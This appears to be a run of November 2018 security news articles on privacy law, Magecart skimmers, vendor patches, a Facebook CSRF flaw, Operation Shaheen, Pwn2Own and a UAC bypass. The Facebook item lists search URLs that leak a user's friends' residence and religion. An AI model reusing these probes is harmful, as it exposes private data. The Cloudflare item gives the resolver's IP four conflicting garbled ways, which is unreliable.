The result is that while the EU has one basic law covering data protection, privacy controls and breach notification (GDPR), the U.S. has a patchwork of state and federal laws, common law and public and private enforcement that has evolved over the last 100 years and more.
Every state now has its own breach notification law. California started the ball rolling in 2003 with the first state legislation. Now 48 US states, the District of Columbia, Guam, Puerto Rico and the US Virgin Islands have enacted their own data breach notification laws that require affected individuals to be notified in the event of an information security breach. South Dakota introduced its first breach notification law this year.
The problem for U.S. business is that there is currently no absolute standard, and no federal law – although there are separate sector-specific requirements. In November 2018, chip giant Intel published a draft model federal bill that it calls the "Innovative and Ethical Data Use Act of 2018," to improve protection of personal privacy through nationwide standards.
In general, these laws have been expanded over the years to include more specific data and privacy requirements. For example, on September 1, Colorado’s new HB 18-1128 came into force, requiring formal information security policies as well as increased oversight of third parties.
Now California is again leading the way with its new California Consumer Privacy Act (CCPA) enacted on June 28, 2018 (and due to come into force on January 1, 2020). CCPA has some alignment with GDPR, but remains different. For example, it includes exemptions for small businesses: it only applies to companies with more than $25 million in annual gross revenue, or those that collect personal information from more than 50,000 consumers, or derive more than 50% of revenue from the sale of personal information.
Nevertheless, it is the most stringent of the U.S. state level data protection laws and is expected to be followed by other states before it comes into force. It is also fair to say that it is driving a backlash among the tech giant firms, who, for the first time ever, are now lobbying in favor of a federal data protection law.
Federal versus State
2018 has seen a resurfacing of interest in a federal data protection law. It is worth remembering, however, that while state government tends to concentrate on the wishes of the electorate (that is, on consumers), the federal government tends to concentrate on the national economy (that is, on business).
According to the New York Times (August 2018), “In recent months, Facebook, Google, IBM, Microsoft and others have aggressively lobbied officials in the Trump administration and elsewhere to start outlining a federal privacy law, according to administration officials and the companies. The law would have a dual purpose, they said: It would overrule the California law and instead put into place a kinder set of rules that would give the companies wide leeway over how personal digital information was handled.”
Federal concern over stringent state legislation is not uncommon. In September, the Justice Department sued California to stop the state’s new net neutrality bill shortly after it was signed by California Gov. Jerry Brown.
Attorney General Jeff Sessions said at the time, “States do not regulate interstate commerce – the federal government does. Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy.”
At a stretch, that comment could be applied to data protection and breach notification state laws where a third-party state with milder laws could have the commerce of its indigenous businesses affected by California’s new law.
This roll-back of consumer-centric state laws to a business-centric federal law seems to be what companies like Facebook, Google and Microsoft are targeting.
On September 24, the Electronic Frontier Foundation wrote to the Committee on Commerce, Science, & Transportation. “EFF submits this letter to the Senate Commerce Committee to detail the dangers to individual user privacy posed by industry suggestions that Congress should wipe the slate clean of state privacy laws through pre-emption,” it said.
“The Committee should understand that the only reason many of these companies seek congressional intervention now, after years of opposing privacy legislation both federally and at the states, is because state legislatures and attorney generals have acted more aggressively to protect the privacy interest of their states’ residents, in many cases over their objections.”
The likelihood of a federal privacy law
This perfect storm, she suggests, has arrived in the form of GDPR together with the European regulators (“the most aggressive privacy regulators in the world”); the failure of U.S. firms to prevent massive privacy scandals (such as Facebook and Equifax); and the rise of aggressive state-level legislation such as California’s CCPA.
Perhaps just as importantly, she adds, “In a non-binding vote on July 5, the European Parliament called for the Privacy Shield Data Transfer Arrangement between the European Union and the U.S. to be suspended later this year due to the U.S.’s failure to implement all of its obligations under the agreement.”
Advantages and disadvantages of relying on state-level regulations
National laws reflect what the national government perceives to be beneficial to the nation. This usually means encouraging business and business innovation. State laws more closely reflect the wishes of consumers.
There is an immediate conflict of interest here. In an age of big data, big business makes money from using and selling personal data, while consumers have an innate desire for privacy and a distrust of big business. For example, a survey of 1000 Americans conducted by BestVPN this month found that 87.5 percent of respondents, regardless of age and gender, are ‘slightly’ to ‘very concerned’ about the privacy of their personal data online. It is state government rather than federal government that is most likely to prioritize such consumer concerns.
“US state-level data protection and breach notification laws involve the data controllers and processors (i.e. the companies and their partners), the affected individuals, law enforcement, and State Attorneys General as stakeholders,” explains Rishi Bhargava, Co-founder at Demisto. “The onus of protection and notification is placed upon the data collectors, with conditions placed upon individual/public notification, when to inform legal authorities, and so on.”
Individual states can, he added, “include or modify requirements that align with the political, social, and technological nuances of that particular state.” And there’s the problem for business. The state laws differ among themselves in their definition of covered entities, the granularity of information to be included in a breach notification, the triggering conditions, the time limits and much more.
It is worth remembering that one of the primary drivers behind the development of GDPR was to provide a single data protection regulation across the entire European market for the benefit of both business and consumers.
In the U.S. right now, large organizations must navigate 50 state laws, and numerous international laws such as GDPR. Separate from the state and international laws, comments David Ginsburg, VP of marketing at Cavirin, “there are federal laws that cover specific verticals. For example, Gramm-Leach-Bliley for finance, HIPAA for healthcare, the Fair Credit Reporting Act for consumer credit rating, the Family Education Rights and Privacy Act for education, and others. Note that there are also actions in congress to tighten laws for some of these verticals. For example, breach notification and penalties for credit reporting agencies on the back of the Equifax fiasco.”
A way forward
The requirement for a federal data protection and privacy regulation has never been greater. It will probably happen – but the question is whether a federal government can find a way of satisfying both business and consumers; and, it should be said, the European Union who will demand some degree of equivalence with GDPR to maintain the Privacy Shield.
One solution would be to mirror GDPR itself at a federal level. This would make concerns over trade and Privacy Shield obsolete. It would probably satisfy most consumers, but would bring the full force and power of big business lobbying against it – and the national government will seek to accommodate business concerns.
The likelihood is a watered-down data protection and privacy regulation. Business will seek for it to pre-empt the state laws – which the states and privacy activists will oppose. “The Supremacy Clause within Article VI of the U.S. Constitution,” explains Simberkoff, “ensures that if a conflict exists between federal and state law, the federal law would prevail. However, states might create additional laws that give their citizens more rights, so long as their laws did not conflict with the overarching federal government’s legislation.”
This is the preferred way forward for Bhargava. “A combination of federal laws, which act as a base, and state laws, which add on stricter requirements, would be an ideal combination to aim toward,” he told SecurityWeek. “While base level federal requirements would be very useful, state-level laws allow for states to adopt additional, stricter measures to protect individuals’ data and hold data controllers/processors accountable. This applies both to companies that house data in a particular state as well as affected individuals that live in a particular state.”
But there remains one organization that can never be ignored where standards and regulations are concerned: NIST. NIST is already working on a voluntary Framework for Online Privacy; and what starts as voluntary in NIST often gets incorporated into legislation.
She describes the purpose of the project as “to collaboratively develop the Privacy Framework as a voluntary, enterprise-level tool that could provide a catalog of privacy outcomes and approaches to help organizations prioritize strategies that create flexible, effective privacy protection solutions and that let individuals enjoy the benefits of innovative technologies with greater confidence and trust.”
But NIST, it should be remembered, is an agency of the United States Department of Commerce. Its primary purpose is to promote innovation in commerce. It is not a consumer organization.
Whether the federal government develops a federal data protection and privacy law, kicks it over to NIST, or leaves legislation up the individual states, it looks like the battle for privacy in the United States is probably just beginning.
Seven Hacking Groups Operate Under “Magecart” Umbrella, Analysis Shows
14.11.2018 securityweek CyberCrime
At least seven different cybercrime groups referred to as "Magecart hackers" are placing digital credit card skimmers on compromised e-commerce sites, Flashpoint and RiskIQ reveal in a joint report.
Active since at least 2015, the Magecart hackers steal credit card information by placing digital skimmers on the websites they visit.
Although the hackers managed to remain unnoticed for about three years, they gained a lot of attention lately, after targeting high-profile online destinations, including Ticketmaster, British Airways, and Newegg.
More recently, the hackers hit third-party services, such as Feedify and Shopper Approved, and even targeted Magento extensions. The attacks have increased in number and have been highly successful in compromising e-commerce sites, yet the number of victims is difficult to determine.
After conducting a thorough investigation into these attacks, Flashpoint and RiskIQ security researchers discovered that the Magecart umbrella isn’t representative for a single group of attackers, but for at least seven of them, each with their own skimmers, tactics, targets, and other unique elements. The list, however, is not comprehensive.
Group 3, the researchers say, attempts to compromise a high volume of targets, to hit as many victims as possible. Their skimmer checks if any of the forms on the checkout page holds payment information, which makes it unique when compared to other Magecart groups.
Group 4, which the researchers say is extremely advanced, uses code that can blend in with the victims' sites to hide in plain sight and employs various methods to avoid detection. Their skimmer is only served if the request is made with a valid user-agent at the bare minimum.
The group likely “originates from another crime business involved in malware distribution and hijacking of banking sessions using web injects,” the security researchers note.
Instead of going for individual stores, Group 5 hacks third-party suppliers to breach a large number of targets. Their skimmer is fairly typical among Magecart groups, likely because the hackers purchased the same kit as the others, but the group is responsible for the Ticketmaster incident, and Feedify and Shopper Approved attacks, among many others.
Group 6 only goes for top-tier targets, such as British Airways and Newegg, in an attempt to secure a high-volume of traffic and transactions. Despite using a simple skimmer, the group has had massive impact, even if their malicious code wasn’t present on the target websites for long.
Without a well-defined modus operandi, Group 7 attempts to compromise any e-commerce website it can find. The hackers use a simple skimmer, tailored for the specific type of checkout process each of their victims uses. The group leverages compromised sites as proxies for its stolen data.
“Magecart is only now becoming a household name. However, its activity isn't new and points to a complex and thriving criminal underworld that has operated in the shadows for years,” RiskIQ and Flashpoint note in their joint report.
The security researchers also note that web-skimming isn’t unique to Magecart. One unrelated group uses the technique in a widespread brand-impersonation campaign, to steal credit card data. The cybercriminals set up stores that mimic legitimate vendors such as Nike, Adidas, The North Face, and others, and place the skimmers on them. Over 800 such brand impersonation/skimming stores were observed since June 2018.
SAP Patches Critical Vulnerability in HANA Streaming Analytics
14.11.2018 securityweek Vulnerebility
SAP this week published its November 2018 set of security patches, which include 11 new Security Patch Day Notes, along with 3 updates for previously released notes.
This month’s Security Notes include a Hot News note, five notes rated High, and eight notes considered Medium risk.
The most important of the Notes (CVSS score of 9.9) addresses two vulnerabilities in the Spring Framework library used by SAP HANA Streaming Analytics, tracked as CVE-2018-1270 and CVE-2018-1275.
The remote command execution issue could be exploited for unauthorized code execution, allowing an attacker to access arbitrary files and directories located in a SAP server file system, ERPScan, a company that specializes in securing SAP and Oracle applications, says.
Another critical SAP security note (CVSS score 8.6) released this month addresses four vulnerabilities (CVE-2018-2488, CVE-2018-2491, CVE-2018-2489, and CVE-2018-2490) in the SAP Fiori Client for Android, the native mobile application used for communication with the SAP Fiori server.
The bugs includes a denial of service issue, a remote HTML injection flaw, missing authorization checks, and information disclosure, Onapsis, which also specialized in securing Oracle and SAP programs, says. A fifth vulnerability (CVE- 2018-2485) breaks Android's sandboxing, allowing an attacker to perform arbitrary tasks via a malicious application targeting the bug, without triggering a notification to the user.
“An attacker could remotely control his malware, to exfiltrate sensitive devices contents, like all phone contacts, all calendar schedule, pictures, SAP system configuration file, and cookie sessions. This information can be used to develop more critical attacks or spying on end users, retrieve date and time of an important meeting, record audio during this interval and exfiltrate the audio file,” Onapsis says.
SAP also addressed a Denial of Service in SAP Mobile Secure Android Application, which is none other than the re-branded SAP Afaria Android client. A malicious app could target the bug to crash SAP Mobile Secure without user interaction.
Other important Security Notes released this month address a Zip Slip in SAP Disclosure Management (CVE-2018-2487) and a Denial of service in Web Intelligence Richclient 3 Tiers Mode (CVE-2018-2473). SAP also addressed an issue with leveraging privileges by customer transaction code (CVE-2018-2481).
The Medium risk bugs addressed this month impact SAP Basis (TREX / BWA installation), NetWeaver Knowledge Management XMLForms, BusinessObjects Business Intelligence Platform, NetWeaver AS ABAP Business Server Pages, and NetWeaver (forums).
This moth, implementation flaws and denial of service bugs were the most encountered vulnerability types. SAP also addressed Cross-site Scripting, remote command execution, missing authorization check, directory traversal, open redirect, verb tampering, XML External Entity, and server side request forgery flaws.
Adobe Patches Disclosed Acrobat Vulnerability
14.11.2018 securityweek Vulnerebility
Adobe has released Patch Tuesday updates for Flash Player, Acrobat and Reader, and Photoshop CC to address three vulnerabilities – one in each product.
The most interesting update is for the Windows version of Acrobat and Reader. It addresses an information disclosure vulnerability for which a proof-of-concept (PoC) exploit is already publicly available.
According to Adobe, exploitation of the flaw, tracked as CVE-2018-15979, “could lead to an inadvertent leak of the user’s hashed NTLM password.”
The security hole, credited by Adobe to free exploit detection service EdgeSpot, has been classified as “important severity,” but it has been assigned a priority rating of “1,” which indicates that there is a high risk of exploitation.
This is not the first time we hear of an Acrobat vulnerability that can be exploited to obtain NTLM credentials. In April, Check Point disclosed the details of a similar vulnerability, tracked as CVE-2018-4993, that could have been exploited by injecting malicious content into a PDF which would cause NTLM hashes to be automatically leaked when the file was opened. Adobe initially said it did not plan on releasing a fix, but a few weeks later it decided to release patches and mitigations.
Since in both cases Adobe has pointed users to the same mitigations, it’s possible that EdgeSpot has identified a new variant of CVE-2018-4993 and the previously published PoC can be easily adapted. SecurityWeek has reached out to EdgeSpot and Adobe for clarifications and will update this article if they respond.
The vulnerability patched on Tuesday in Flash Player, identified as CVE-2018-15978, is an out-of-bounds read bug that can lead to information disclosure. The issue affects the Windows, macOS, Linux and Chrome OS versions of Flash Player, but Adobe does not expect to see it being exploited any time soon.
Finally, Adobe has released updates for the Windows and macOS versions of Photoshop CC to address an out-of-bounds read bug that can lead to information disclosure. The vulnerability was reported to the tech giant by an anonymous researcher via Trend Micro’s Zero Day Initiative (ZDI).
Adobe says there is no evidence that any of these vulnerabilities have been exploited for malicious purposes.
Earlier this month, researchers warned that malicious actors had been exploiting a recently patched Adobe ColdFusion vulnerability to hack websites.
UPDATE. EdgeSpot has published a blog post confirming that the new Acrobat vulnerability (CVE-2018-15979) exists because Adobe failed to properly patch the flaw discovered earlier by Check Point (CVE-2018-4993).
Microsoft Patches Actively Exploited Windows Vulnerability
14.11.2018 securityweek Vulnerebility
Microsoft’s Patch Tuesday updates for November 2018 address more than 60 vulnerabilities, including zero-days and publicly disclosed flaws.
Researchers at Kaspersky Lab informed Microsoft of a privilege escalation vulnerability in Windows that has been actively exploited by malicious actors. The flaw, tracked as CVE-2018-8589, allows an attacker to execute arbitrary code in the context of the local user. The issue, caused due to the way Windows handles calls to Win32k.sys, only affects Windows 7 and Windows Server 2008.
Since exploitation requires authentication, threat actors are likely exploiting the flaw in combination with another vulnerability or stolen credentials. Kaspersky will soon share additional details about the security hole and the attacks.
Last month, Microsoft patched another zero-day reported by Kaspersky. That flaw, identified as CVE-2018-8453, had been exploited by the threat group known as FruityArmor in a highly targeted campaign.
Microsoft has also patched a privilege escalation vulnerability disclosed last month by a researcher who uses the online moniker SandboxEscaper.
The weakness, identified as CVE-2018-8584, is related to the Advanced Local Procedure Call (ALPC), and Microsoft says an authenticated attacker can use it to elevate privileges and take control of a vulnerable system. Windows 10 and recent versions of Windows Server are impacted.
A proof-of-concept (PoC) exploit published by SandboxEscaper when the flaw was disclosed deletes files from the system and causes it to crash. The researcher has published a blog post describing how the issue was discovered.
The researcher previously disclosed an unpatched Windows vulnerability which ended up being exploited in attacks by a threat group tracked as PowerPool. Microsoft learned about both vulnerabilities through public disclosure.
Microsoft also resolved a disclosed vulnerability that allows an attacker with physical access to a system to bypass BitLocker device encryption. The tech giant says this issue is not related to research on flawed SSD encryption, for which it recently published an advisory.
Nearly a dozen of the vulnerabilities patched this month are critical, including several memory corruption bugs affecting Internet Explorer and Edge, and remote code execution flaws in the Windows Deployment Services TFTP server, graphics components, and the VBScript engine.
Adobe’s Patch Tuesday updates address vulnerabilities in Flash Player, Acrobat and Reader, and Photoshop. The flaw patched in Acrobat and Reader is the most interesting as a PoC exploit is publicly available.
Facebook flaw could have exposed private info of users and their friends
14.11.2018 securityaffairs Social
Security experts from Imperva reported a new Facebook flaw that could have exposed private info of users and their friends
A new security vulnerability has been reported in Facebook, the flaw could have been exploited by attackers to obtain certain personal information about users and their network of contacts.
The recently discovered issue raises once again the concerns about the privacy of the users of social network giant.
The vulnerability was discovered by security experts from Imperva, it resides in the way Facebook search feature displays results for queries provided by the users.
The good news for Facebook users is that this flaw has already been patched and did not allow attackers to conduct massive scraping of the social network for users’ information.
The page used to display the results of the users’ queries includes iFrame elements associated with each result, experts discovered that the URLs associated to those iFrames is vulnerable against cross-site request forgery (CSRF) attacks.
The exploitation of the flaw is quite simple, an attacker only needs to trick users into visiting a specially crafted website on their web browser where they have already logged into their Facebook accounts.
“Since the number of iframe elements on the page reflects the number of search results, we can simply count them by accessing the fb.frames.length property.
By manipulating Facebook’s graph search, it’s possible to craft search queries that reflect personal information about the user.”
Searching something like “pages I like named `Imperva`” the exports noticed they were forcing the social network to return one result if the user liked the Imperva page or zero results if not.
Composing specific queries it was possible to extract data about the user’s friends, below some interesting examples of queries provided by the experts:
Check if the current Facebook users have friends from Israel: https://www.facebook.com/search/me/friends/108099562543414/home-residents/intersect
Check if the user has friends named “Ron”: https://www.facebook.com/search/str/ron/users-named/me/friends/intersect
Check if the user has taken photos in certain locations/countries: https://www.facebook.com/search/me/photos/108099562543414/photos-in/intersect
Check if the current user has Islamic friends: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/intersect
Check if the current user has Islamic friends who live in the UK: https://www.facebook.com/search/me/friends/109523995740640/users-religious-view/106078429431815/residents/present/intersect
Check if the current user wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_me%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
Check if the current user’s friends wrote a post that contains a specific text: https://www.facebook.com/search/posts/?filters_rp_author=%7B%22name%22%3A%22author_friends%22%2C%22args%22%3A%22%22%7D&q=cute%20puppies
Below the video PoC published by Imperva:
The process can be repeated without the need for new popups or tabs to be open because the attacker can control the location property of the Facebook window using the following code.
Experts pointed out that mobile users are particularly exposed to such kind of attack because it is easy for them to forget open windows in the background allowing attackers to extract the results for multiple queries.
Imperva reported the flaw to Facebook through the company’s vulnerability disclosure program in May 2018, and the social network addressed the problem in a few days implementing CSRF protections.
Operation Shaheen – Pakistan Air Force members targeted by nation-state attackers
14.11.2018 securityaffairs CyberSpy
Security firm Cylance has uncovered a sophisticated state-sponsored campaign, tracked as Operation Shaheen, against the Pakistan Air Force.
According to the experts the campaign was carried out by a nation-state actor tracked as the White Company with access to zero-day exploits and exploit developers.
“The preliminary findings detail one of the group’s recent campaigns, a year-long espionage effort directed at the Pakistani Air Force. Cylance calls the campaign Operation Shaheen and the organization The White Company—in acknowledgement of the many elaborate measures the organization takes to whitewash all signs of its activity and evade attribution.” reads the press release published by Cylance.
“The Pakistani Air Force is not just an integral part of the country’s national security establishment—including its nuclear weapons program—but it is also the newly announced home of the country’s National Centre for Cyber Security. A successful espionage operation against such a target could yield significant tactical and strategic insight to a range of foreign powers.”
As part of Operation Shaheen, White Company hackers targeted members of the Pakistan Air Force with spear-phishing messages that weaponized lure files with names referenced events, government documents, or news articles of interest for the targets (i.e. the Pakistani Air Force, the Pakistani government, and Chinese Military and advisers in Pakistan).
Attackers initially used phishing messages with links to compromised websites, then they switched to emails using infected Word documents as attachments.
In both cases, the researchers found, the emails were specifically crafted to reference topics that would be relevant to appeal to the targets: the Pakistani Air Force, the Pakistani government, and Chinese Military and advisers in Pakistan.
“We cannot say with precision where those documents went, or which were successful. However, we can say that the Pakistan Air Force was a primary target. This is evident by the overriding themes expressed in document filenames, the contents of the decoy documents, and the specificity employed in the military-themed lures.” continues the report published by Cylance.
“In addition, as explained below, the malware delivered by these lures was delivered from domains not just of legitimate, compromised Pakistani organizations — a common tactic attackers use to make any traffic the target might observe seem benign — but legitimate, compromised Pakistani organizations with an explicit connection to the Pakistani military.”
The malicious code used by White Company hackers was able to evade major antivirus solutions, including Sophos, ESET, Kaspersky, BitDefender, Avira, Avast, AVG, and Quickheal.
The malware used in the campaign implements five different packing techniques that placed the ultimate payload within a series of layers.
Attribute the attack to a specific actor is very difficult, a broad range of nation-state attackers would have an interest in spying on the Pakistani Air Force members.
“Cylance does not endeavor to conclusively attribute attacks or campaigns to specific
entities, as a matter of principle, for several reasons. This approach is particularly prudent in this case. The threat actor in question took great pains to elude attribution. They cobbled together tools created by several different developers, some of whom took steps to cover their tracks. These efforts served to complicate the overall picture of what occurred and who was behind it.” concludes the firm.
“Pakistan is a tumultuous, nuclear-armed nation with a history of explosive internal politics. Their position on the geopolitical chessboard makes them an obvious target of all the nation states with well-developed cyber programs (i.e. the Five Eyes, China, Russia, Iran, DPRK, Israel),”
“They also draw attention from emerging cyber powers like India and the Gulf nations.”
Additional info are included in the report published by the experts.
Microsoft’s Patch Tuesday updates for November 2018 fix actively exploited Windows flaw
14.11.2018 securityaffairs Vulnerebility
Microsoft’s Patch Tuesday updates for November 2018 fixed more than 60 vulnerabilities, including an actively exploited Windows flaw.
Microsoft’s Patch Tuesday updates for November 2018 addressed 63 vulnerabilities, including an actively exploited Windows privilege escalation vulnerability.
Twelve of the flaws were rated as “Critical”, 49 are rated Important, two vulnerabilities were publicly known at the time of release (CVE-2018-8584, a Windows ALPC elevation of privilege issue, and CVE-2018-8566, a BitLocker security feature bypass flaw), and one of them was reportedly under active attack.
9 of the 12 Critical flaws addressed with Microsoft’s Patch Tuesday updates for November 2018 are remote code execution (RCE) vulnerabilities in the Chakra scripting engine in Microsoft Edge. The remaining three Critical bugs affects in the Windows Deployment Services TFTP Server, Microsoft Graphics Components, and Windows VBScript Engine.
The flaw exploited in attacks in the wild is tracked as CVE-2018-8589 and could be exploited by an authenticated attacker to execute arbitrary code in the context of the local user, it ties the way Windows handles calls to Win32k.sys.
The vulnerability was reported by experts from Kaspersky Lab, it has been actively exploited by threat actors. The CVE-2018-8589 vulnerability only affects Windows 7 and Windows Server 2008.
” CVE-2018-8589 – Win32k Elevation of Privilege Vulnerability
Just like last month, November has a Win32K (kernel-mode drivers) elevation of privilege vulnerability listed as currently under active attack. Also like last month, this bug was reported by researchers at Kaspersky Labs, indicating this bug is being used in malware.” reads the description published by Zero Day Initiative.
“Again, this is likely being used in targeted attacks in combination with other bugs. Malware often uses kernel elevation bugs to go from user-mode to admin-mode, allowing them full control of a target system.”
Microsoft has addressed a Windows ALPC Elevation of Privilege Vulnerability tracked as CVE-2018-8584 that was disclosed last month by the researcher that goes online with the moniker SandboxEscaper.
SandboxEscaper published a tweet containing a link to a Github page hosting a proof-of-concept (PoC) exploit for a privilege escalation vulnerability affecting Microsoft Data Sharing (dssvc.dll).
Samsung Galaxy S9, iPhone X Hacked at Pwn2Own Tokyo
14.11.2018 securityweek Congress
Apple iPhone X, Samsung Galaxy S9 and Xiaomi Mi 6 smartphones have all been hacked on the first day of the Pwn2Own Tokyo 2018 contest taking place these days alongside the PacSec security conference in Tokyo, Japan.
First, a team made up of Amat Cama and Richard Zhu, calling themselves “fluoroacetate,” hacked the Xiaomi Mi 6 using an NFC exploit. According to the Zero Day Initiative (ZDI), the organizer of Pwn2Own, they leveraged an out-of-bounds write bug affecting WebAssembly to achieve code execution via NFC. The researchers earned $30,000 for this hack.
It also took the MWR Labs team two tries to demonstrate an exploit on the Samsung Galaxy S9. The white hats hacked a captive portal with no user interaction, and leveraged unsafe redirect and unsafe application loading bugs to execute code on the phone, which earned them another $30,000.
The Fluoroacetate team also demonstrated a code execution exploit against a Samsung Galaxy S9. The exploit involved a heap overflow in the device’s baseband component and it earned the researchers $50,000.
The same team hacked an iPhone X over Wi-Fi using a Just-In-Time (JIT) bug and an out-of-bounds write flaw. This attempt earned them $60,000.
Pwn2Own Tokyo 2018 participants earned a total of $225,000 on the first day of the event.
On the second day, Fluoroacetate and MWR Labs will make several attempts to hack the iPhone X and the Xiaomi Mi 6.
This is the first Pwn2Own competition that also covers IoT devices, such as Apple Watch, Amazon Echo, Google Home, Amazon Cloud Cam, and Nest Cam IQ Indoor. The prizes for these products range between $40,000 and $60,000, but apparently no exploits will be presented. Other devices not targeted this year are the Huawei P20 and the Google Pixel 2.
Participants earned more than half a million dollars at last year’s Mobile Pwn2Own competition after hacking the Galaxy S8, iPhone 7 and Huawei Mate 9 Pro.
UPDATE. ZDI has published a blog post with additional information on each of the exploits.
Intel Asks for Comments on Draft Federal Privacy Law
14.11.2018 securityweek IT
Intel Proposes "Innovative and Ethical Data Use Act of 2018" to Improve Protection of Personal Privacy Through Nationwide Standards
The basic acceptance that personal privacy in a digital world can only be protected by legislation has been growing around the world. In Europe it led to the development of the General Data Protection Regulation (GDPR). An EU 'Regulation' can broadly be seen as similar to a U.S. federal law -- one that in Europe takes precedence over member-state national laws, and in the U.S. takes precedence over state laws.
In this sense the 'federal versus state' argument over privacy protection has been settled in Europe. It is only just beginning in the U.S. With no national-level federal law on privacy protection, individual states have implemented their own state laws -- culminating, one might say, in not the latest but probably the strongest: the California Consumer Privacy Act of 2018 (CCPA).
This in turn has led to a reversal in the position previously taken by the big tech companies. Personal data has become integral to digital commerce. It drives marketing and is seen as essential to business. Those companies that don't use it directly still collect it and sell it to those that do. This has been largely unencumbered by any federal privacy law -- but is now being restricted by state laws.
Big companies are beginning to lobby -- for the first time -- for a federal law to take precedence over state privacy laws. There are many reasons for this; but the bottom line is that they expect a federal law to be less restrictive on the gathering and use of personal data than, for example, CCPA.
Intel has now entered this debate. Its position, however, is not 'should there be a federal law?', but 'what should it include?'. It has developed and published a draft model federal bill that it calls the "Innovative and Ethical Data Use Act of 2018", and is inviting comments from businesses, privacy experts and the general public.
Intel rejects the idea of allowing individual states to develop individual state-level privacy laws. "The US needs a law that promotes ethical data stewardship, not one that just attempts to minimize harm. A non-harmonized patchwork of state legislation will cause companies to default to restrictive requirements and the result will decrease the likelihood of realizing technology's great potential to improve lives. Intel has drafted proposed legislation to realize that potential. It promotes innovative data use, while requiring organizations that process personal data to implement measures to demonstrate responsibility."
Since without a federal law companies are likely to default to the strongest state requirements -- effectively the California Consumer Protection Act -- the implication is that Intel is seeking a federal privacy law that is less consumer-centric and more business-friendly. "What the US needs is a privacy law that parallels the country's ethos of freedom, innovation and entrepreneurship. That law needs to protect individuals and enable for the ethical use of data." The clue is in the title: its primary purpose is to protect data use, not to protect consumer privacy.
Intel makes the case that business needs to be protected from restrictive consumer privacy to enable, for example, "technologies like artificial intelligence to help solve the world's greatest challenges. The combination of advances in computing power, memory and analytics create a possibility for technology to make tremendous strides in precision medicine, disease detection, driving assistance, increased productivity, workplace safety, education and more."
These are strong arguments, and define the difference between the European approach to personal privacy and the proposed U.S. approach. While Europe has focused privacy protection on the consumer, allowing business what is fair to them, the Intel approach is to focus on the free flow of data between business, allowing consumers what is fair to them.
This is not to say that there are no personal privacy protections within Intel's proposal. There are. For example, companies cannot collect personal data "that is not relevant and necessary to accomplish the specified purpose(s)", for which the consumer must provide "explicit consent". However, the proposed Act tries hard to make privacy protection compatible with business purposes.
For example, "Only the forms of processing or the specific processing activity that are prohibited by the requirements [of this Act] shall be prohibited. Processing activities that do not meet the requirements shall not be prohibited."
There is also a 'safe harbor' against civil sanctions, "if a corporate officer certifies in writing to the Federal Trade Commission that it has conducted a thorough review of compliance with this Act, and specifically of the accountability program required by Section 4(h), and such review does not reveal any material non-compliance with the requirements of this Act that have not been mitigated." Compliance with this act can be self-certified, and self-certification can be at least a partial defense against civil action.
Intel's draft model federal privacy act has only been online for a few days. The website invites comments -- which can only be good for democracy. At the time of writing this, there have been just 12 comments (including 4 replies from the Intel spokesperson, David Hoffman). On the whole, these are supportive. One stands out, however, as being highly critical. Lynne Taylor comments, "[Student] data is being constantly harvested to the point it's called 'student data rape'. Not once, in this proposed Bill were there clear enough parameters to halt the over 1400 data points being harvested every day. Many of these violate, not only the U.S. Constitution, but the Civil Rights of every single American. Not to mention the overreach by ANY federal agent, agency, or program with, by US Federal law was prohibited from becoming involved in education, including related services and programs."
This voice representing the consumer (here specifically the student) perhaps marks the beginning of the real debate. This is just the beginning, and it should be remembered that that European Union took many years in developing GDPR. Big tech has not yet added its voice -- and probably only will if it senses that business is losing the argument.
"It is a good baseline for discussion and of course goes beyond the protections in GDPR and California Consumer Privacy Act (CCPA) in the types of data covered," David Ginsburg, VP of marketing at Cavirin, told SecurityWeek. "However, we are already seeing a disconnect between what is proposed on the state level (i.e., CCPA) and what the major social platforms would like to see on the national level due to their monetization of user data. I expect this to be the major point of contention."
Dr. Bret Fund, founder and CEO at SecureSet, is supportive. "I applaud Intel's proactive approach to defining 'personal data' and 'privacy risk', drafting a bill and creating an open forum where all can comment and weigh in. From the interaction I am seeing from many in the industry on their site, it is surfacing the right questions, comments and debate. Intel's bill isn't going to solve the privacy concerns and debate single-handedly, but their approach goes a long way to move it forward in a very productive manner."
Whether Intel will adapt its draft in line with any of the comments it receives remains to be seen. Similarly, Congress, which many people feel is likely to develop a federal user privacy law in the very near future, may simply ignore every aspect of Intel's proposal. If it does not, this Intel project could develop into a rich source of arguments put forward by business interests, privacy advocates and the general public.
New Cloudflare DNS App Brings Increased Privacy for Mobile Devices
14.11.2018 securityweek Mobil
Web security and performance company Cloudflare is making it easier for smartphone users to secure their Internet connections, courtesy of a new DNS resolver app for mobile devices.
Available on both Android and iOS, the application leverages the free, secure 126.96.36.199 DNS resolver service the company launched on April 1.
The 188.8.131.52 service is meant to provide users with increased privacy by preventing Internet Service Providers from seeing which websites a user accesses. Unlike other providers of similar services, Cloudflare is committed to not saving data to disk and to wiping log records within 24 hours.
Now, mobile phone users too can take advantage of these privacy and security features, so that their browsing remains private when connecting to the Internet, even when using public connections.
The 184.108.40.206 tool, the Internet company explains, makes it easy to get a faster, more private, Internet experience. However, given that it has been too complex for many people to use, particularly on mobile devices, the new app helps using 220.127.116.11 whenever a mobile phone connects to the Internet.
Launched in beta a month ago, the new app helps users overcome any difficulties they might have met when attempting to change network settings to use Cloudflare’s DNS service. Many were not able to make the necessary changes, especially on mobile devices, the company says.
“It is the right thing to do. We are making it easier for everyone to make their experience when they use the Internet more private. People should not have to pay to have a more private Internet,” Cloudflare says.
Researcher Bypasses Windows UAC by Spoofing Trusted Directory
14.11.2018 securityweek Vulnerebility
A security researcher from Tenable, Inc. recently discovered that it is possible to bypass Windows’ User Account Control (UAC) by spoofing the execution path of a file in a trusted directory.
Although Microsoft doesn’t consider UAC a security boundary, the feature still brings additional security benefits. UAC alerts users in the Administrators group when a program attempts to run with elevated privileges, so that the user can confirm the action.
However, the UAC prompt does not appear for all administrative executables on Windows, as some programs can auto-elevate, thus bypassing UAC. However, Windows has a series of additional security checks in place to ensure that only a select group of trusted executables can auto-elevate.
Even so, the approach can be abused to bypass UAC, and Tenable’s David Wells recently discovered a new technique that leverages this functionality to ensure that no UAC prompt is displayed when a rogue executable runs.
Executables that can auto-elevate need to be already configured for auto-elevation (in which case an “autoElevate” key exists for that file), to be properly signed, and to run from a Trusted Directory, such as “C:\Windows\System32,” the security researcher explains.
